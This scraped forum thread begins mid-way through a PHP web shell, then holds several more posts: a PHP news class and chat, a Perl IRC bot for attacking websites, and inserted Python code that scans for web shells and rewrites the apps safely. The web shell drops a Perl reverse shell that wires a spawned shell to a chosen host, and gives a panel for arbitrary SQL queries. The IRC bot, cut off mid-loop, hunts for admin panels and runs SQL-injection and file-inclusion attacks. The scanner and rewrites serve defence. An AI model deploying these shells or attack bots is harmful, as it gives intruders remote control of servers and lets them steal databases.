    Port : <input type=text name=port value=666><br><br>
    Type : <select name=tipo>
    <option>Perl</option>
    </select>
    <br><br><br>
    <input type=submit value=Conectar>

    ";
    }

    if (isset($_GET['ip'])) {


    if ($_GET['tipo']=="Perl") {

    $code = '
    #!usr/bin/perl
    #Reverse Shell 0.1
    #By Doddy H

    use IO::Socket;

    print "\n== -- Reverse Shell 0.1 - Doddy H 2010 -- ==\n\n";

    unless (@ARGV == 2) {
    print "[Sintax] : $0 <host> <port>\n\n";
    exit(1);
    } else {
    print "[+] Starting the connection\n";
    print "[+] Enter in the system\n";
    print "[+] Enjoy !!!\n\n";
    conectar($ARGV[0],$ARGV[1]);
    tipo();
    }

    sub conectar {

    socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname("tcp"));
    connect(REVERSE, sockaddr_in($_[1],inet_aton($_[0])));
    open (STDIN,">&REVERSE");
    open (STDOUT,">&REVERSE");
    open (STDERR,">&REVERSE");
    }

    sub tipo {
    print "\n[*] Reverse Shell Starting...\n\n";
    if ($^O =~/Win32/ig) {
    infowin();
    system("cmd.exe");
    } else {
    infolinux();
    system("export TERM=xterm;exec sh -i");
    }
    }

    sub infowin {
    print "[+] Domain Name : ".Win32::DomainName()."\n";
    print "[+] OS Version : ".Win32::GetOSName()."\n";
    print "[+] Username : ".Win32::LoginName()."\n\n\n";
    }

    sub infolinux {
    print "[+] System information\n\n";
    system("uname -a");
    print "\n\n";
    }

    # ¿ The End ?

    ';

    $de = $_SERVER["HTTP_USER_AGENT"];

    if(eregi("Win",$de)){
    if ($test =  fopen("back.pl","w")) {
    echo "<br><br><b>[+] Shell Created</b><br>";
    } else {
    echo "<br><br><b>[-] Error creating the shell</b><br>";
    }
    } else {

    if ($test = fopen("/tmp/back.pl","w")) {
    echo "<br><br><b>[+] Shell Created</b><br>";
    } else {
    echo "<br><br><b>[-] Error creating the shell</b><br>";
    }

    }

    if (fwrite($test,$code)) {

    if(eregi("Win",$de)){
    if (chmod("back.pl",0777)) {
    echo "<b>[+] Perms Changed<br></b>";
    } else {
    echo "<b>[-] Not priviligies to changed permissions</b><br>";
    }
    echo "<b>[+] Loading Shell</b><br><br><br>";
    echo "<fieldset>";
    if (!system("perl back.pl ".$_GET['ip']. " ".$_GET['port'])) {
    echo "<script>alert('Error Loading Shell');</script>";
    }
    echo "</fieldset>";
    } else {
    if (chmod("/tmp/back.pl",0777)) {
    echo "<b>[+] Perms Changed<br></b>";
    } else {
    echo "<b>[-] Not priviligies to changed permissions</b><br>";
    }
    echo "<b>[+] Loading Shell</b><br><br><br>";
    echo "<fieldset>";
    if (!system("cd /tmp;perl back.pl ".$_GET['ip']. " ".$_GET['port'])) {
    echo "<script>alert('Error Loading Shell');</script>";
    }
    echo "</fieldset>";
    }
    } else {
    echo "<br><b>[-] Error writing in the shell<br><br></b>";
    }
    }
    }

    if (isset($_GET['sql'])) {

    echo "

    <h2>SQL Manager</h2><br><br>

    <form action='' method=GET>
    Server : <input type=text name=host value=localhost><br>
    User : <input type=text name=usuario value=root><br>
    Pass : <input type=text name=password value=123><br><br>
    <input type=submit name=entersql value=Connect>
    </form>
    ";

    }

    if (isset($_GET['entersql'])) {

    if ($mysql = @mysql_connect($_GET['host'],$_GET['usuario'],$_GET['password'])) {
    if ($databases = @mysql_list_dbs($mysql)) {

    echo "<br><br><h2>Databases Found</h2><br>";
    echo "<table>";
    while($dat = @mysql_fetch_row($databases)) {
    foreach($dat as $indice => $valor) {
    echo  "<td class=main>$valor</td><td class=main><a href=?datear=$valor&host=".$_GET['host']."&usuario=".$_GET['usuario']."&password=".$_GET['password']."&enterdb=".$valor.">Enter</a></td><td class=main><a href=?datear=$valor&host=".$_GET['host']."&usuario=".$_GET['usuario']."&password=".$_GET['password']."&bajardb=".$valor.">Download</a></td><tr>";
    }
    }
    echo "</table>";
    } else {
    echo "<script>alert('Error loading databases');</script>";
    exit(1);
    }
    } else {
    echo "<script>alert('Error');</script>";
    exit(1);
    }
    }

    if (isset($_GET['enterdb'])) {

    $mysql = mysql_connect($_GET['host'],$_GET['usuario'],$_GET['password']);
    mysql_select_db($_GET['enterdb']);
    $tablas = mysql_query("show tables from ".$_GET['enterdb'])  or die("error");
    echo "<br><h2>Tables Found</h2><br><br><table>";
    while ($tabla = mysql_fetch_row($tablas)) {
    foreach($tabla as $indice => $valor) {
    echo "<td class=main>$valor</td><td class=main><a href=?datear=$valor&host=".$_GET['host']."&usuario=".$_GET['usuario']."&password=".$_GET['password']."&entertable=".$valor."&condb=".$_GET['enterdb'].">Enter</a></td></td><td class=main><a href=?datear=$valor&host=".$_GET['host']."&usuario=".$_GET['usuario']."&password=".$_GET['password']."&bajartabla=".$valor."&condb=".$_GET['enterdb'].">Download</a><tr>";
    }
    }
    echo "</table>";
    }

    if (isset($_GET['entertable'])) {

    $mysql = mysql_connect($_GET['host'],$_GET['usuario'],$_GET['password']);
    mysql_select_db($_GET['condb']);

    echo "<br><h2>SQL Manager</h2>
    <br><br>
    <form action='' method=POST>
    Consulta SQL : <input type=text name=sentencia size=70>
    <br><br><br>
    <input type=hidden name=host value=".$_GET['host'].">
    <input type=hidden name=usuario value=".$_GET['usuario'].">
    <input type=hidden name=password value=".$_GET['password'].">
    <input type=hidden name=condb value=".$_GET['database'].">
    <input type=hidden name=entertable value=".$_GET['tabla'].">
    <input type=submit name=mostrar value=eNViar>
    </form>
    <br><br><br><br><br>";

    $conexion = mysql_connect($_GET['host'],$_GET['usuario'],$_GET['password']) or die("<h1>Error</h1>");
    mysql_select_db($_GET['condb']);

    if (isset($_POST['mostrar'])) {
    if(!empty($_POST['sentencia'])) {
    $resultado =  mysql_query($_POST['sentencia']);
    } else {
    $resultado = mysql_query("SELECT * FROM ".$_GET['entertable']);
    }

    $numer = 0;

    echo "<table>";
    for ($i=0;$i< mysql_num_fields($resultado);$i++) {
    echo "<th class=main>".mysql_field_name($resultado,$i)."</th>";
    $numer++;
    }
    while($dat = mysql_fetch_row($resultado)) {
    echo "<tr>";
    foreach($dat as $val) {
    echo "<td class=main>".$val."</td>";
    }
    }
    echo "</tr></table>";
    }
    }

    echo "<br><br>";

    } else {


    echo "
    <form action='' method=POST>
    user : <input type=text name=user><br>
    pass : <input type=text name=pass><br><br>
    <input type=submit value=Login>
    </form>
    ";

    }

    // ¿ The End ?

    ?>



    Any suggestions or errors, let me know so I can improve it.
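A defender-side triage check for the listing above, added here as an example and not part of the original post: a small static scanner that flags the traits this shell exhibits (request values passed straight to eval()/system(), file operations keyed on raw $_GET/$_POST values, the log-wiping find commands, the PoisonShell banner). Rule names, weights, the threshold and both PHP samples are constructed.

```python
"""Static triage of PHP files for the traits the PoisonShell listing above
exhibits. Added example, not part of the original post; rule names, weights,
the threshold and both PHP samples are constructed for the demonstration."""
from __future__ import annotations

import re
from dataclasses import dataclass

# (rule name, pattern, weight). The weights are a constructed heuristic: a
# request value reaching eval()/system() or a log-wiping command is decisive
# on its own, a file operation keyed on raw input needs corroboration.
RULES = [
    ("exec-sink-from-request",
     re.compile(r"\b(eval|system|exec|shell_exec|passthru|popen)\s*\(\s*"
                r"\$_(GET|POST|REQUEST|COOKIE)\s*\["), 5),
    ("fs-op-from-request",
     re.compile(r"\b(readfile|unlink|chmod|rename|copy|fopen|mkdir|rmdir|file)"
                r"\s*\(\s*\$_(GET|POST|REQUEST)\s*\["), 3),
    ("log-wiping",
     re.compile(r"find\s+/\s+-name\s+\S*(bash_history|bash_logout|log)\S*\s+-exec\s+rm"
                r"|unset\s+(HISTFILE|SAVEHIST)"), 5),
    ("credentials-from-request",
     re.compile(r"\b(ftp_login\s*\(\s*\$\w+\s*,\s*|mysql_connect\s*\(\s*)"
                r"\$_(GET|POST)\s*\["), 2),
    ("known-shell-banner", re.compile(r"PoisonShell", re.IGNORECASE), 4),
]
WEIGHTS = {name: weight for name, _pattern, weight in RULES}


@dataclass(frozen=True)
class Finding:
    rule: str
    line_no: int  # 1-indexed line in the scanned source
    text: str


def scan_php(source: str) -> list[Finding]:
    """Return one Finding per (rule, line) pair that matches."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        for name, pattern, _weight in RULES:
            if pattern.search(line):
                findings.append(Finding(name, line_no, line.strip()))
    return findings


def risk_score(findings: list[Finding]) -> int:
    """Sum weights over *distinct* rules hit, so a long file does not
    out-score a short one just by repeating the same pattern."""
    return sum(WEIGHTS[rule] for rule in {f.rule for f in findings})


def verdict(source: str, threshold: int = 8) -> str:
    """'webshell-likely' once the distinct-rule score reaches the threshold."""
    return "webshell-likely" if risk_score(scan_php(source)) >= threshold else "clean"


# Constructed excerpt modelled on the listing above (not the full shell).
SUSPICIOUS_PHP = r"""<?php
echo "<title>[+] PoisonShell (C) Doddy Hackman 2011 </title>";
if (isset($_GET['down'])) { readfile($_GET['down']); }
if (isset($_POST['ejecutar'])) { system($_POST['comando']); }
if (isset($_POST['cargar'])) { eval($_POST['codigo']); }
$comandos = array('find / -name *.bash_history -exec rm -rf {} \;', 'unset HISTFILE');
$dentro = ftp_login($enter, $_GET['user'], $_GET['pass']);
"""

# Constructed benign handler: input is cast, bound or path-checked before use,
# so none of the raw-request patterns fire.
BENIGN_PHP = r"""<?php
$id = (int) $_GET['id'];
$stmt = $pdo->prepare('SELECT title, body FROM news WHERE id = ?');
$stmt->execute([$id]);
$path = realpath(__DIR__ . '/uploads/' . basename($_GET['file']));
if ($path !== false && strpos($path, __DIR__ . '/uploads/') === 0) { readfile($path); }
"""

if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_PHP), ("benign", BENIGN_PHP)):
        hits = scan_php(src)
        print(f"{label}: {verdict(src)} (score {risk_score(hits)})")
        for f in hits:
            print(f"  line {f.line_no} [{f.rule}] {f.text}")
```

Run over a web root, the per-line findings give an analyst the exact lines to review; the distinct-rule score is only a triage aid and a real deployment would tune the rule set against the application's own code.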
#329

Hello everyone

I just made my second OOP project in PHP; it's a simple news system
called "noticion" xDDD

Apararentemente es segura contra SQLI , y posee las siguientes funciones para manejar noticias

  • Conectar con la DB

    Código: text

    datos("server","user","pass","db","tabla","columna id","columna titulo","columna contenido","columna fecha")


  • Crear noticia con

    Código: text

    crear("id","titulo","contenido","fecha")


  • Eliminar noticia con

    Código: text

    eliminar("id de la noticia")


  • Ver contenido de noticia

    Código: text

    ver("id de la noticia")


    Devuelve un array con el que pueden ver cada columna con sus datos

  • Modificar contenido de noticia

    Código: text

    mod("nuevo id","nuevo titulo","nuevo contenido","nueva fecha")


    Eso seria todo

    Codigo de noticion.php

    Código: text

    <?php

    /*

    Noticion 0.3

    (c) DOddy Hackman 2010


    Anti SQLI

    */


    class noticion {


    private $host;
    private $db;
    private $user;
    private $pass;
    private $tabla;
    private $id;
    private $titulo;
    private $contenido;
    private $fecha;
    private $conexion;   // link resource, kept so close() can release it



    public function datos($host,$user,$pass,$db,$tabla,$id,$titulo,$contenido,$fecha) {
    $this->host = $host;
    $this->db = $db;
    $this->user = $user;
    $this->pass = $pass;
    $this->tabla = $tabla;
    $this->id = $id;
    $this->titulo = $titulo;
    $this->contenido = $contenido;
    $this->fecha = $fecha;
    $this->conexion = mysql_connect($host,$user,$pass);
    @mysql_select_db($db,$this->conexion);

    }

    // the id is only accepted when numeric; every string column goes through mysql_real_escape_string
    private function limpiar($valor) {
    return mysql_real_escape_string($valor,$this->conexion);
    }

    public function eliminar($id) {
    if (is_numeric($id)) {
    if (@mysql_query("DELETE FROM ".$this->tabla." WHERE ".$this->id."='".$id."'",$this->conexion)) {
    return true;
    }
    }
    return false;
    }

    public function nuevo($x_id,$x_titulo,$x_contenido,$x_fecha) {
    if (is_numeric($x_id)) {
    if (@mysql_query("INSERT INTO ".$this->tabla." (".$this->id.",".$this->titulo.",".$this->contenido.",".$this->fecha.") VALUES ('".$x_id."','".$this->limpiar($x_titulo)."','".$this->limpiar($x_contenido)."','".$this->limpiar($x_fecha)."')",$this->conexion)) {
    return true;
    }
    }
    return false;
    }

    public function ver($id) {
    if (is_numeric($id)) {
    if ($que = @mysql_query("SELECT ".$this->id.",".$this->titulo.",".$this->contenido.",".$this->fecha." FROM ".$this->tabla." WHERE ".$this->id."='".$id."'",$this->conexion)) {
    if ($ver = @mysql_fetch_row($que)) {
    return array($ver[0],$ver[1],$ver[2],$ver[3]);
    }
    }
    }
    return false;
    }

    public function mod($id,$tit,$con,$fech) {
    if (is_numeric($id)) {
    if (@mysql_query("UPDATE ".$this->tabla." SET ".$this->id."='".$id."',".$this->titulo."='".$this->limpiar($tit)."',".$this->contenido."='".$this->limpiar($con)."',".$this->fecha."='".$this->limpiar($fech)."' WHERE ".$this->id."='".$id."'",$this->conexion)) {
    return true;
    }
    }
    return false;
    }

    public function close() {
    mysql_close($this->conexion);
    }


    }

    ?>


    Usage example

    noticia.php

    Code: text

    <?php


    include("noticion.php");
    $noti = New noticion;
    $noti->datos("localhost","root","123","noticias","noticia","id","titulo","cotenido","fecha");
    //$noti->nuevo("3","hola","dfdfdfdf","5465465");
    $noti->eliminar("'");   // non-numeric id: the class rejects it and runs no query

    if ($noti->mod("3","holax","dfdfdfdf","5465465")) {
    echo "cambiado<br><br>";
    }

    if ($ver = $noti->ver(3)) {
    echo $ver[1]."<br>";
    }

    //if ($noti->mod("1","cambie","cambie","cambie")) {
    //echo "cambiado";
    //}



    As always, any failure, vulnerability or suggestion is
    welcome for improving the class
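
The post's class rewritten as an added example, not the post's own code: Python on sqlite3 with every value bound as a parameter, the same nuevo / eliminar / ver / mod methods, and, for comparison, an insert that builds the SQL string the way the class does. The table, column names and the title payload are constructed for the demo; the numeric gate on the id is kept, and the payload shows that the gate says nothing about the other three columns.

```python
import sqlite3

# Constructed schema standing in for the MySQL table the post's class is pointed at.
SCHEMA = "CREATE TABLE noticia (id INTEGER, titulo TEXT, contenido TEXT, fecha TEXT)"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    return conn


def _as_id(value):
    """Equivalent of the post's is_numeric gate: a non-numeric id is rejected and no query runs."""
    try:
        return int(value)
    except (TypeError, ValueError):
        return None


class Noticion:
    """Same methods as the post's class.

    Identifiers (table and column names) cannot be bound, so they are checked
    against Python's identifier rule; every value is passed as a parameter.
    """

    def __init__(self, conn, tabla, id_col, titulo_col, contenido_col, fecha_col):
        for name in (tabla, id_col, titulo_col, contenido_col, fecha_col):
            if not name.isidentifier():
                raise ValueError("bad identifier: %r" % name)
        self.conn = conn
        self.tabla = tabla
        self.cols = (id_col, titulo_col, contenido_col, fecha_col)

    def nuevo(self, id_, titulo, contenido, fecha):
        key = _as_id(id_)
        if key is None:
            return False
        sql = "INSERT INTO %s (%s,%s,%s,%s) VALUES (?,?,?,?)" % ((self.tabla,) + self.cols)
        self.conn.execute(sql, (key, titulo, contenido, fecha))
        return True

    def eliminar(self, id_):
        key = _as_id(id_)
        if key is None:
            return False
        self.conn.execute("DELETE FROM %s WHERE %s=?" % (self.tabla, self.cols[0]), (key,))
        return True

    def ver(self, id_):
        key = _as_id(id_)
        if key is None:
            return None
        sql = "SELECT %s,%s,%s,%s FROM %s WHERE %s=?" % (self.cols + (self.tabla, self.cols[0]))
        return self.conn.execute(sql, (key,)).fetchone()

    def mod(self, id_, titulo, contenido, fecha):
        key = _as_id(id_)
        if key is None:
            return False
        sql = "UPDATE %s SET %s=?,%s=?,%s=? WHERE %s=?" % (
            self.tabla, self.cols[1], self.cols[2], self.cols[3], self.cols[0])
        self.conn.execute(sql, (titulo, contenido, fecha, key))
        return True


def nuevo_concat(conn, id_, titulo, contenido, fecha):
    """The post's pattern: numeric check on the id, the other values pasted into the SQL text."""
    if _as_id(id_) is None:
        return False
    sql = "INSERT INTO noticia (id,titulo,contenido,fecha) VALUES ('%s','%s','%s','%s')" % (
        id_, titulo, contenido, fecha)
    conn.execute(sql)
    return True


# Constructed title: closes the quoted value, completes the row, adds a second row
# and comments out the rest of the statement the application appends.
PAYLOAD = "x','y','z'),(99,'injected','','') -- "


def demo():
    """Run the same title through both inserts; returns {'concat': rows, 'bound': rows}."""
    out = {}
    conn = make_db()
    nuevo_concat(conn, 3, PAYLOAD, "c", "2011")
    out["concat"] = conn.execute("SELECT id, titulo FROM noticia ORDER BY id").fetchall()
    conn = make_db()
    Noticion(conn, "noticia", "id", "titulo", "contenido", "fecha").nuevo(3, PAYLOAD, "c", "2011")
    out["bound"] = conn.execute("SELECT id, titulo FROM noticia ORDER BY id").fetchall()
    return out
```

demo() returns two rows for the string-built insert (the second one with id 99 came from the title) and one row holding the payload verbatim for the bound insert.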

#330
Back-end / [PHP] Simple Chat By Doddy H
July 03, 2011, 09:51:25 PM
As the title says, it is a simple chat split into 3 parts

install.php

Code: php

<?php

//DB connection settings

$host = "localhost";
$user = "root";
$pass = "";
$db = "chat";

echo "
<title>Instalacion de mini chat</title>
<br><br><b>Seguro que desea instalar mini chat</b><br><br>
<form action='' method=POST>
<input type=submit name=instalar value=Instalar>
</form>
<br><br>";


if (isset($_POST['instalar'])) {

if (mysql_connect($host,$user,$pass)) {

// the database has to exist before the table can be created inside it
$todo1 = "create database if not exists $db";

$todo2 = "create table $db.mensajes (
id_comentario int(10) UNSIGNED NOT NULL AUTO_INCREMENT,
mensaje TEXT NOT NULL,
apodo VARCHAR(255) NOT NULL,
PRIMARY KEY (id_comentario));
";


if (@mysql_query($todo1)) {
if (@mysql_query($todo2)) {
echo "chat instalado<br>";
} else {
echo "error en la instalacion<br>";
}
} else {
echo "error en la instalacion<br>";
}
} else {
echo "error en la conexion con la db<br>";
}
}

?>


admin.php

Code: php

<?php

$host = "localhost";
$user = "root";
$pass = "";

$usera = "test";
$passa = "test";

if (isset($_GET['user'])) {

if ($_GET['user'] == $usera) {
if ($_GET['pass'] == $passa) {

@mysql_connect($host,$user,$pass);

// delete first and list afterwards, so the removed comment is gone in the same page load
if (isset($_GET['id']) && is_numeric($_GET['id'])) {
if (@mysql_query("delete from chat.mensajes where id_comentario='".$_GET['id']."'")) {
echo "<script>alert('Comentario borrado');</script>";
}
}

$re = @mysql_query("select * from chat.mensajes");

while ($ver = @mysql_fetch_array($re)) {
echo "<a href=?user=".$usera."&pass=".$passa."&id=".$ver[0].">Borrar comentario ".$ver[0]."</a><br>";
}

}
}


}

?>


index.php

Code: php

<?php

$db = "chat"; //
$host = "localhost";
$user = "root";
$pass = "";

echo "
<style>

.main {
word-wrap: break-word;
word-break:break-all;
margin : -287px 0px 0px -490px;
border : White solid 1px;
BORDER-COLOR: #00FF00;
}

td,body {
background-color:black;color:#00FF00;
}


input,textarea,select {
font: normal 10px Verdana, Arial, Helvetica,
sans-serif;
background-color:black;color:#00FF00;
border: solid 1px #00FF00;
border-color:#00FF00
}

</style>";

mysql_connect($host,$user,$pass);
mysql_select_db($db);

echo "<table border=0 width='300' style='table-layout: fixed'>";
echo "<td class=main><b>Mini Chat 0.2</b></td><tr>";


$sumo = mysql_query("SELECT MAX(id_comentario) FROM $db.mensajes");

$s = mysql_fetch_row($sumo);

$total = $s[0];

// keep only the 10 newest messages: every id at or below $total-10 is dropped in one query
$test = $total - 10;

if ($test > 0) {
@mysql_query("DELETE FROM $db.mensajes WHERE id_comentario <= '$test'");
}


$re = @mysql_query("select * from $db.mensajes order by id_comentario DESC");

while ($ver = @mysql_fetch_array($re)) {
echo "<td class=main><b>".$ver[2]."</b>:".$ver[1]."</td><tr>";
}


echo "<br><br><td class=main><br><b>Dejar mensaje</b><br><br>
<form action='' method=POST>
Apodo : <input type=text name=apodo size=25><br>
Texto : <input type=text name=msg size=25><br><br>
<input type=submit name=chatentro value=Mandar>
</form>
</td></tr>
<td class=main><b>Coded By Doddy H</b></td><tr>
</table>";


if (isset($_POST['chatentro'])) {

// truncate the raw input first, so the cut never lands inside an escape sequence
$apodo = substr($_POST['apodo'],0,70);
$mensaje = substr($_POST['msg'],0,70);

$insultos = array("lammer","lamer","puto","noob");

// case-insensitive, so "Lamer" and "LAMER" are masked as well
foreach ($insultos as $con) {
$mensaje = str_ireplace($con,'#$!*',$mensaje);
$apodo = str_ireplace($con,'#$!*',$apodo);
}

// htmlentities for the browser, mysql_real_escape_string for the query
$apodo = mysql_real_escape_string(htmlentities($apodo));
$mensaje = mysql_real_escape_string(htmlentities($mensaje));

// id_comentario is AUTO_INCREMENT, so the database assigns the id; no MAX(id)+1 read is needed
@mysql_query("INSERT INTO $db.mensajes (apodo,mensaje) VALUES ('".$apodo."','".$mensaje."')");

echo '<meta http-equiv="refresh" content=0;URL=>';

}

?>


Those would be the three parts; the chat has the following options

  • It only allows 10 messages, so it deletes the oldest ones
  • It filters bad words

    That would be all

    Report any vulnerability you find
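
The chat's rules as an added example in Python on sqlite3, not the post's code: the 70-character limit, HTML escaping, the insult filter (made case-insensitive) and the "keep the last 10" rule, with the trimming done in a single DELETE and the id assigned by AUTOINCREMENT instead of a MAX(id)+1 read. The table layout follows install.php; the messages fed in are constructed.

```python
import html
import re
import sqlite3

BAD_WORDS = ("lammer", "lamer", "puto", "noob")   # the post's list
MASK = "#$!*"
MAX_LEN = 70
MAX_MESSAGES = 10

# One alternation for all words; IGNORECASE catches "Lamer"/"LAMER", which a
# case-sensitive str_replace lets through. Substring matching is kept as in the post.
BAD_RE = re.compile("|".join(re.escape(w) for w in BAD_WORDS), re.IGNORECASE)


def clean(text):
    """Truncate the raw input first, then HTML-escape it, then mask insults."""
    text = text[:MAX_LEN]
    return BAD_RE.sub(MASK, html.escape(text, quote=True))


def open_chat():
    conn = sqlite3.connect(":memory:")
    # Same columns as install.php. AUTOINCREMENT assigns the id, so two posts arriving
    # at once cannot both read the same MAX(id) and collide.
    conn.execute(
        "CREATE TABLE mensajes ("
        "id_comentario INTEGER PRIMARY KEY AUTOINCREMENT,"
        "mensaje TEXT NOT NULL, apodo TEXT NOT NULL)")
    return conn


def trim_to_last(conn, n=MAX_MESSAGES):
    """Drop everything but the newest n rows in one statement (the post deletes id by id)."""
    conn.execute(
        "DELETE FROM mensajes WHERE id_comentario NOT IN "
        "(SELECT id_comentario FROM mensajes ORDER BY id_comentario DESC LIMIT ?)", (n,))


def post_message(conn, apodo, mensaje):
    conn.execute("INSERT INTO mensajes (apodo, mensaje) VALUES (?, ?)",
                 (clean(apodo), clean(mensaje)))
    trim_to_last(conn)


def messages(conn):
    """Newest first, the order index.php lists them in."""
    return conn.execute(
        "SELECT apodo, mensaje FROM mensajes ORDER BY id_comentario DESC").fetchall()
```

After twelve posts only the ten newest remain, and an upper-case insult inside a tag is both masked and escaped.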

#331
Perl / [Perl] Terr0r B0t By Doddy H
July 03, 2011, 09:50:28 PM
Hello everyone.

Today I bring you a program I wrote last night; it is an IRC bot with
the following options:

* Encoding and decoding of base64, hex, ascii
* Search for the admin panel of a site
* SQLI scan (finds the number of columns and gives info)
* Tool to exploit LFI

Commands for the bot in the channel

Code: perl

!base64 encode/decode string
!hex encode/decode string
!ascii encode/decode string
!panel http://127.0.0.1
!sqli http://127.0.0.1/sql.php?id=
!lfi http://127.0.0.1/lfi.php?file='


Usage:

Code: perl

C:/Users/DoddyH/Desktop/Arsenal X>terror-b0t.pl


[+] tERR0R b0T (c) dODDy HacKMaN 2010

[+] Starting the bot
[+] Online




Code: perl

#!usr/bin/perl
#Terr0r B0t (C) Doddy Hackman 2010
#Commands to use
#
#!base64 encode/decode string
#!hex encode/decode string
#!ascii encode/decode string
#!panel http://127.0.0.1
#!sqli http://127.0.0.1/sql.php?id=
#!lfi http://127.0.0.1/lfi.php?file='
#
#





use IO::Socket;
use LWP::UserAgent;
use HTTP::Request::Common;
use MIME::Base64;



@dns = ('www','www1','www2','www3','ftp','ns','mail','3com','aix','apache','back','bind','boreder','bsd','business','chains','cisco','content','corporate','cpv','dns','domino','dominoserver','download','e-mail','e-safe','email','esafe','external','extranet','firebox','firewall','front','fw','fw0','fwe','fw-1','firew','gate','gatekeeper','gateway','gauntlet','group','help','hop','hp','hpjet','hpux','http','https','hub','ibm','ids','info','inside','internal','internet','intranet','ipfw','irix','jet','list','lotus','lotusdomino','lotusnotes','lotusserver','mailfeed','mailgate','mailgateway','mailgroup','mailhost','maillist','mailpop','mailrelay','mimesweeper','ms','msproxy','mx','nameserver','news','newsdesk','newsfeed','newsgroup','newsroom','newsserver','nntp','notes','noteserver','notesserver','nt','outside','pix','pop','pop3','pophost','popmail','popserver','print','printer','private','proxy','proxyserver','public','qpop','raptor','read','redcreek','redhat','route','router','scanner','screen','screening','s#ecure','seek','smail','smap','smtp','smtpgateway','smtpgw','solaris','sonic','spool','squid','sun','sunos','suse','switch','transfer','trend','trendmicro','vlan','vpn','wall','web','webmail','webserver','webswitch','win2000','win2k','upload','file','fileserver','storage','backup','share','core','gw','wingate','main','noc','home','radius','security','access','dmz','domain','sql','mysql','mssql','postgres','db','database','imail','imap','exchange','sendmail','louts','test','logs','stage','staging','dev','devel','ppp','chat','irc','eng','admin','unix','linux','windows','apple','hp-ux','bigip','pc');


@panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.ph
p','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admi
n4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/');

# files tried by the !lfi command; the post does not include the list, so fill it in before use
@buscar3 = ();

my $nave = LWP::UserAgent->new();
$nave->timeout(13);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");


print "\n[+] tERR0R b0T (c) dODDy HacKMaN 2010\n\n";

my $servidor = "127.0.0.1"; #Servidor IRC
my $canal = "#locos"; #Canal IRC del servidor especificado
my $nick = "Lepuke-Slave"; # Apodo del bot
my $port = "6667"; # Puerto del servidor IRC

print "[+] Starting the bot\n";

my $soquete = new IO::Socket::INET( PeerAddr =>$servidor,
PeerPort => $port,
Proto => 'tcp' );

if (!$soquete) {
print "\n[-] No se puedo conectar en $servidor $port\n";
exit 1;
}


print $soquete "NICK $nick\r\n";
print $soquete "USER $nick 1 1 1 1\r\n";
print $soquete "JOIN $canal\r\n";

print "[+] Online\n\n";

while ( my $log = <$soquete> ) {
chomp($log);

if ($log =~ /^PING(.*)$/i){
print $soquete "PONG $1\r\n";
}

if($log =~ m/:!panel (.*)$/g) {
scan($1);
